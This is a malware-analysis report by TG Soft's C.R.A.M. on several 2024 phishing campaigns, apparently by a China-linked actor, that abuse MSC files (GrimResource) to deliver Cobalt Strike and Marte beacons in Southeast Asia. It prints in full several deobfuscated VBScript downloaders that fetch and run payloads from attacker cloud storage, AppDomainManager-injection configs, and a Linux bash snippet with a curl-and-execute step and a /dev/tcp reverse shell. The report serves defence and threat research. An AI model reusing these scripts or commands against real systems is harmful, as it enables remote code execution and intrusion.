Over the past few months, TG Soft's C.R.A.M. has been monitoring different threat actors abusing MSC files.
The first APT group to use .MSC files in their attacks was #Kimsuky in April 2024, as reported by company Genians. In May 2024, the use of this technique was also observed by the APT group known as #MustangPanda, which carries the #PlugX malware as reported by NTT.
In June 2024, the abuse of .MSC files was detected with the vulnerability called #GrimResource as reported by Elastic.
TG Soft's C.R.A.M. continued to monitor the situation in the following months, identifying new malware campaigns carried out by an unknown cyber-actor that is most likely of Chinese origin to target Southeast Asia.

Below is the timeline of the monitored attacks:

Campaign Analysis

Campaign of August 2, 2024

On August 2, 2024, an email campaign was released with the following file attached: 水域污染詳細訊息.msc 

Translating the file name from Chinese to english, the document refers to: Detailed information on water pollution.msc
The image of the infection chain is shown in the figure:

The MSC file via the vulnerability known as GrimResource automatically executes the following script:


Decripting it gives the following more readable script:

Option Explicit Dim objShell, objFSO, objHTTP Dim strURL1, strURL2, strURL3, strShowfileURL Dim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath Dim strExecutablePath strURL1 = "https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/oncesvc.exe" strURL2 = "https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/oncesvc.exe.config" strURL3 = "https[:]//wordpresss-data[.]s3[.]me-south-1[.]amazonaws[.]com/water.txt" strShowfileURL = "https[:]//wordpresss-data[.]s3.me-south-1[.]amazonaws[.]com/ws.pdf" strDownloadPath1 = "C:\Users\Public\oncesvc.exe" strDownloadPath2 = "C:\Users\Public\oncesvc.exe.config" strDownloadPath3 = "C:\Users\Public\water.txt" strShowfilePath = "C:\Users\Public\wrasb.pdf" strExecutablePath = "C:\Users\Public\oncesvc.exe" Set objShell = CreateObject("WScript.Shell") Set objFSO = CreateObject("Scripting.FileSystemObject") Set objHTTP = CreateObject("MSXML2.XMLHTTP") If Not objFSO.FileExists(strDownloadPath1) Then     DownloadFile strURL1, strDownloadPath1 End If If Not objFSO.FileExists(strDownloadPath2) Then     DownloadFile strURL2, strDownloadPath2 End If If Not objFSO.FileExists(strDownloadPath3) Then     DownloadFile strURL3, strDownloadPath3 End If If Not objFSO.FileExists(strShowfilePath) Then     DownloadFile strShowfileURL, strShowfilePath End If objShell.Run strExecutablePath, 1, True objShell.Run strShowfilePath, 1, True Sub DownloadFile(url, path)     Dim objStream     Set objStream = CreateObject("ADODB.Stream")     objHTTP.Open "GET", url, False     objHTTP.Send     If objHTTP.Status = 200 Then         objStream.Open         objStream.Type = 1 ' adTypeBinary         objStream.Write objHTTP.ResponseBody         objStream.SaveToFile path, 2 ' adSaveCreateOverWrite         objStream.Close     End If     Set objStream = Nothing End Sub

The script downloads the following files into the C:\Users\Public folder:

• oncesvc.exe (Microsoft legitimate file "ClickOnce")
• oncesvc.exe.config (Configuration file to load malicious DLL)
• water.txt (Unused file, probably to track infection)
• ws.pdf (Decoy)

Below we see the images of the decoy PDF file:
The oncesvc.exe.config file contains the following configuration:

<configuration>    <runtime>       <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">          <dependentAssembly>             <assemblyIdentity name="oncesvc" publicKeyToken="205fcab1ea048820" culture="neutral" />             <codeBase version="0.0.0.0" href="https[:]//360photo[.]oss-cn-hongkong[.]aliyuncs[.]com/202407111985.jpeg"/>          </dependentAssembly>       </assemblyBinding>       <etwEnable enabled="false" />       <appDomainManagerAssembly value="oncesvc, Version=0.0.0.0, Culture=neutral, PublicKeyToken=205fcab1ea048820" />       <appDomainManagerType value="oncesvc" />    </runtime> </configuration>

The shellocode uses a custom DBJ2 algorithm to determine the hash of the API names to use, as we see in the figure:


The 64bit shellcode connects to domain status[.]s3cloud-azure[.]com on the port 8080 at the page:
/common/oauth2/authorize?client_id=<ID del cliente>
by sending the following request via post: {"user":"password"}

The following information is sent in base 64 in the client_id field:

• username with an indication of whether it is Administrator (isAdmin)
• PC name
• process name
• indication of the architecture of the operating system (32 or 64 bit)
• system memory

Then the shellcode calls the following page: /api/v1/homepage/<id>

If the answer you get is different from:

• NULL
• 404 Not Found!

then a new shellcode is executed as we see in the figure:


During the analysis the shellcode downloaded and executed a third stage containing the Marte Beacon with CobaltStrike which connected to the site: static[.]trendmicrotech[.]com with 8443 port (ipv6: 2a06:98c1:3120:0:0:0:0:7) at the pages:

• GET /etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/resources/fonts.
• POST /OneCollector/1.0

This version of CobaltStrike created the following pipe: \\.\pipe\srvsvc-1-5-5-067b62
The August 2 campaign targeted the Taiwan government as reported by StrikeReady_Labs

Campaign of July 16, 2024

On July 16, 2024, the file Cert.msc was uploaded to Virus Total from Vietnam .
It is assumed that this is the first campaign used by the threat actor exploiting the grim resource technique.
The MSC file contains an obfuscated script from which the following is obtained:

Option Explicit Dim objShell, objFSO, objHTTP Dim strURL1, strURL2 Dim strDownloadPath1, strDownloadPath2 Dim strExecutablePath strURL1 = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe" strURL2 = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe.config" strDownloadPath1 = "C:\Users\Public\Music\Cert.exe" strDownloadPath2 = "C:\Users\Public\Music\Cert.exe.config" strExecutablePath = "C:\Users\Public\Music\Cert.exe" Set objShell = CreateObject("WScript.Shell") Set objFSO = CreateObject("Scripting.FileSystemObject") Set objHTTP = CreateObject("MSXML2.XMLHTTP") If Not objFSO.FileExists(strDownloadPath1) Then     DownloadFile strURL1, strDownloadPath1 End If If Not objFSO.FileExists(strDownloadPath2) Then     DownloadFile strURL2, strDownloadPath2 End If objShell.Run strExecutablePath, 1, True Sub DownloadFile(url, path)     Dim objStream     Set objStream = CreateObject("ADODB.Stream")     objHTTP.Open "GET", url, False     objHTTP.Send     If objHTTP.Status = 200 Then         objStream.Open         objStream.Type = 1 ' adTypeBinary         objStream.Write objHTTP.ResponseBody         objStream.SaveToFile path, 2 ' adSaveCreateOverWrite         objStream.Close     End If     Set objStream = Nothing End Sub

The script inside the MSC file downloads the following files:

• https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe.config
• https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Cert.exe
• https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/ServiceHub.json
• https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/205fcab1ea04882.jpg

The following files were not available during the analysis:

• Cert.exe
• ServiceHub.json

The Cert.exe file should have been the ServiceHub.Host.netfx.x64.exe program.
The Cert.exe.config file contains the following configuration:

<configuration> <runtime> <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1"> <dependentAssembly> <assemblyIdentity name="ServiceHub" publicKeyToken="205fcab1ea048820" culture="neutral" /> <codeBase version="0.0.0.0" href="https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/ServiceHub.json"/> </dependentAssembly> </assemblyBinding> <etwEnable enabled="false" /> <appDomainManagerAssembly value="ServiceHub, Version=0.0.0.0, Culture=neutral, PublicKeyToken=205fcab1ea048820" /> <appDomainManagerType value="ServiceHub" /> </runtime> </configuration>

It is assumed that the ServiceHub.json file is the malicious DLL that is loaded through the App Domain Manager Injection technique and the 205fcab1ea04882.jpg file instead directly contains the Marte Beacon with CobaltStrike that connected to the site: us2[.]s3bucket-azure[.]online (ipv6: 2a06:98c1:3120:0:0:0:0:7)  at the page "/etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/resources/fonts"

The July 16, 2024 campaign did not use the 64-bit shellcode seen in the August 2 campaign, but instead directly executed the Marte Beacon with Cobalt Strike, as shown in the figure.:

Campaign of August 12, 2024

On August 12, 2024, the file Document_new.pdf.msc was uploaded to Virus Total from Vietnam.
The MSC file contains an obfuscated script from which the following is obtained:

Option Explicit Dim objShell, objFSO, objHTTP Dim strURL1, strURL2, strURL3, strShowfileURL Dim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath Dim strExecutablePath strURL1 = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/a85f760d1f9cd374.json" strURL2 = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/a85f760d1f9cd374.config" strURL3 = "https[:]//yitoo[.]oss-cn-hongkong[.]aliyuncs[.]com/calc.exe" strShowfileURL = "https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/Document_new.pdf" strDownloadPath1 = "C:\Windows\Temp\Service.exe" strDownloadPath2 = "C:\Windows\Temp\Service.exe.config" strDownloadPath3 = "C:\Users\Public\win.ini" strShowfilePath = "C:\Users\Public\Documents\Documents.pdf" strExecutablePath = "C:\Windows\Temp\Service.exe" Set objShell = CreateObject("WScript.Shell") Set objFSO = CreateObject("Scripting.FileSystemObject") Set objHTTP = CreateObject("MSXML2.XMLHTTP") If Not objFSO.FileExists(strDownloadPath1) Then     DownloadFile strURL1, strDownloadPath1 End If If Not objFSO.FileExists(strDownloadPath2) Then     DownloadFile strURL2, strDownloadPath2 End If If Not objFSO.FileExists(strDownloadPath3) Then     DownloadFile strURL3, strDownloadPath3 End If If Not objFSO.FileExists(strShowfilePath) Then     DownloadFile strShowfileURL, strShowfilePath End If objShell.Run strExecutablePath, 1, False objShell.Run strShowfilePath, 1, False Sub DownloadFile(url, path)     Dim objStream     Set objStream = CreateObject("ADODB.Stream")     objHTTP.Open "GET", url, False     objHTTP.Send     If objHTTP.Status = 200 Then         objStream.Open         objStream.Type = 1 ' adTypeBinary         objStream.Write objHTTP.ResponseBody         objStream.SaveToFile path, 2 ' adSaveCreateOverWrite         objStream.Close     End If     Set objStream = Nothing End Sub

The only component we had access to was the calc.exe file, which was stored inside the public folder under the name win.ini.
During the analysis, it was not possible to recover most of the files used in the attack..

Campaign of August 15, 2024

On August 15, 2024, the file readme(解压密码).msc was uploaded to Virus Total
The MSC file contains an obfuscated script from which the following output is obtained:

Option Explicit Dim objShell, objFSO, objHTTP Dim strURL1, strURL2, strURL3, strShowfileURL Dim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath Dim strExecutablePath strURL1 = "https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/oncesvc.exe" strURL2 = "https[:]//bjj-files-production[.]s3[.]sa-east-1[.]amazonaws[.]com/msedge.dll" strURL3 = "https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/oncesvc.exe.config" strShowfileURL = "https[:]//app-dimensiona[.]s3[.]sa-east-1[.]amazonaws[.]com/readme.docx" strDownloadPath1 = "C:\Users\Public\oncesvc.exe" strDownloadPath2 = "C:\Users\Public\msedge.dll" strDownloadPath3 = "C:\Users\Public\oncesvc.exe.config" strShowfilePath = "C:\Users\Public\readme.docx" strExecutablePath = "C:\Users\Public\oncesvc.exe" Set objShell = CreateObject("WScript.Shell") Set objFSO = CreateObject("Scripting.FileSystemObject") Set objHTTP = CreateObject("MSXML2.XMLHTTP") If Not objFSO.FileExists(strDownloadPath1) Then     DownloadFile strURL1, strDownloadPath1 End If If Not objFSO.FileExists(strDownloadPath2) Then     DownloadFile strURL2, strDownloadPath2 End If If Not objFSO.FileExists(strDownloadPath3) Then     DownloadFile strURL3, strDownloadPath3 End If If Not objFSO.FileExists(strShowfilePath) Then     DownloadFile strShowfileURL, strShowfilePath End If objShell.Run strExecutablePath, 1, True objShell.Run strShowfilePath, 1, True Sub DownloadFile(url, path)     Dim objStream     Set objStream = CreateObject("ADODB.Stream")     objHTTP.Open "GET", url, False     objHTTP.Send     If objHTTP.Status = 200 Then         objStream.Open         objStream.Type = 1 ' adTypeBinary         objStream.Write objHTTP.ResponseBody         objStream.SaveToFile path, 2 ' adSaveCreateOverWrite         objStream.Close     End If     Set objStream = Nothing End Sub

This campaign is similar to the one on August 2nd, where the oncesvc.exe file is used to load the malicious DLL downloaded from: https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/af7ffc2a629a1c258336fde8a1f71e0a.json.
Malicious DLL downloads 64-bit shellcode from https[:]//speedshare[.]oss-cn-hongkong[.]aliyuncs[.]com/2472dca8c48ab987e632e66caabf86502bf3.xml.

The 64-bit shellcode is similar to the one seen on August 2nd, the command and control server in this case is api[.]s2cloud-amazon[.]com.
The post used in this case is: {"user":"password1"}, slightly different than the August 2 campaign.
Again the shellcode downloaded the Marte Beacon with Cobalt Strike, which turned out to be the same version seen in the August 2 campaign..

Campaign of August 20, 2024

On August 20, 2024, the file "Hướng dẫn và yêu cầu kiểm tra, giám sát hoạt động của từng đơn vị năm 2024.msc" was uploaded to Virus Total.
The campaign targets Vietnam, translating the file name from Vietnamese would be "Instructions and requirements for inspection and supervision of the activities of each unit in 2024.msc"

The MSC file is similar to those seen in previous campaigns, the ONCESVC.EXE file is replaced with MUSICV.EXE.
The configuration file is the same as seen in the August 15 campaign, the same 64-bit shellcode is downloaded and the same Marte Beacon with Cobalt Strike.

Interesting is the decoy displayed on theme "Vietnam Oil and Gas":

Campaign of August 19, 2024

On August 23, 2024, the file "贵州电视台张青副台长腐败内部视频证据.msc" was uploaded to Virus Total.
The campaign may be targeting France and was delivered on August 19, 2024, as the file name translated from Chinese would be "Internal Video Evidence of Corruption of Deputy Director Zhang Qing of Guizhou TV Station.msc".

The MSC file is similar to the one seen in the previous campaign on August 20, where the MUSICV.EXE program is used.
During the analysis, it was not possible to download the malicious DLL from the link https://speedshare.oss-cn-hongkong.aliyuncs[.]com/af7ffc2a629a1c258336fde8a1f71e0a.json. The link is the same as the campaign of August 20th.

The MSC file contains an obfuscated script from which the following output is obtained:

Option Explicit Dim objShell, objFSO, objHTTP Dim strURL1, strURL2, strURL3, strShowfileURL Dim strDownloadPath1, strDownloadPath2, strDownloadPath3, strShowfilePath Dim strExecutablePath strURL1 = "https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.exe" strURL2 = "https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.exe.config" strURL3 = "https[:]//proradead[.]s3[.]sa-east-1[.]amazonaws[.]com/new.txt" strShowfileURL = "http[:]//152[.]42[.]226[.]161/stime/1x.mp4" strDownloadPath1 = "C:\Users\Public\Music\musicx.exe" strDownloadPath2 = "C:\Users\Public\Music\musicx.exe.config" strDownloadPath3 = "C:\Users\Public\Music\music.txt" strShowfilePath = "C:\Users\Public\proton.mp4" strExecutablePath = "C:\Users\Public\Music\musicx.exe" Set objShell = CreateObject("WScript.Shell") Set objFSO = CreateObject("Scripting.FileSystemObject") Set objHTTP = CreateObject("MSXML2.XMLHTTP") If Not objFSO.FileExists(strDownloadPath1) Then     DownloadFile strURL1, strDownloadPath1 End If If Not objFSO.FileExists(strDownloadPath2) Then     DownloadFile strURL2, strDownloadPath2 End If If Not objFSO.FileExists(strDownloadPath3) Then     DownloadFile strURL3, strDownloadPath3 End If If Not objFSO.FileExists(strShowfilePath) Then     DownloadFile strShowfileURL, strShowfilePath End If objShell.Run strExecutablePath, 1, False objShell.Run strShowfilePath, 1, False Sub DownloadFile(url, path)     Dim objStream     Set objStream = CreateObject("ADODB.Stream")     objHTTP.Open "GET", url, False     objHTTP.Send     If objHTTP.Status = 200 Then         objStream.Open         objStream.Type = 1 ' adTypeBinary         objStream.Write objHTTP.ResponseBody         objStream.SaveToFile path, 2 ' adSaveCreateOverWrite         objStream.Close     End If     Set objStream = Nothing End Sub

Below we see some screenshots of the decoy video downloaded from http://152.42.226[.]161/stime/1x.mp4

Inside the ZIP file sent via email containing the file 贵州电视台张青副台长腐败内部视频证据.msc the file 贵州电视台内部领导张青副台长腐败内幕.docx is also present, which we see below:

Other campaigns in April and May 2024

The analysis of the third stage of the Marte Beacon with Cobalt Strike has allowed us to associate the threat actor with three other campaigns launched between April and May:

• 27 aprile 2024 (Philippines)
• 7 maggio 2024 (Philippines)
• 17 maggio 2024 (Vietnam)

These campaigns did not abuse MSC files to be distributed.

The Marte Beacon with Cobalt Strike could be located from the following url: http://43.199.33[.]246:443/payload.bin
Analyzing the IP 43.199.33[.]246 The April 27 campaign was detected through the executable file named x1ffjiqd.exe, which downloaded and executed the following files:

• http://43.199.33[.]246:443/payload.bin
• http://43.199.33[.]246:443/example.pdf
  

The payload.bin file is the Marte Beacon with Cobalt Strike with C&C server visualstudio-microsoft[.]com and port 443.

The following decoy was used in the April 27 campaign:
The following decoy was used in the May 7 campaign:
In the May 17 campaign the following decoy was used with the name example.docx:

whoami > /tmp/test curl -o /tmp/google_usb_ssh -s https[:]//xianggang000[.]oss-cn-hongkong[.]aliyuncs[.]com/linshi/grrond chmod 777 /tmp/google_usb_ssh /tmp/google_usb_ssh rm /tmp/google_usb_ssh bash -i >& /dev/tcp/43[.]199[.]33[.]246/4433 0>&1 wget https[:]//download[.]chrorne[.]com/error.logs gedit error.logs /dev/null -c /bin/sh

The cybercriminal probably needed to hit a target with a Linux OS. This bash script is similar in behavior to the VisualBasic script used inside MSC files for Windows. In this case the decoy is the display of an email message contained in the "error.logs" file.
 

Conclusions

The campaigns appear to primarily target government agencies and critical infrastructure in Southeast Asia. With particular focus on the following countries: Philippines, Vietnam, and Taiwan.
From August 2nd onwards, the threat actor inserted a new module into its infection chain containing a 64-bit shellcode which then leads to the execution of a third stage with the Marte and Cobalt Strike beacons.
The modus operandi of the cyber actor reflects the techniques of APTs of Chinese origin, it has been noted that the group is operational from Monday to Friday in hours compatible with Chinese ones.
Although it was not possible to make a precise attribution, it could be a subgroup of APT41.

IOC

Authors: Ing. Gianfranco Tonello, Michele Zuin